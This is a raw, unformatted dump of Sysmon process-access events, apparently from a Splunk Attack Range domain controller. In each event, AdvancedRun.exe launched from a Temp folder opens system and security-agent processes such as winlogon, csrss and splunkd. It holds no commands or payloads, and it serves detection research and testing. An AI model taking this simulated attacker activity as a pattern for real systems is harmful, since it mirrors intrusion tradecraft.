18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016229Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016228Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016227Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004016225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016224Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016223Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016222Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016221Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016220Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016219Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016218Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016217Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016216Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016215Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016214Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016213Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 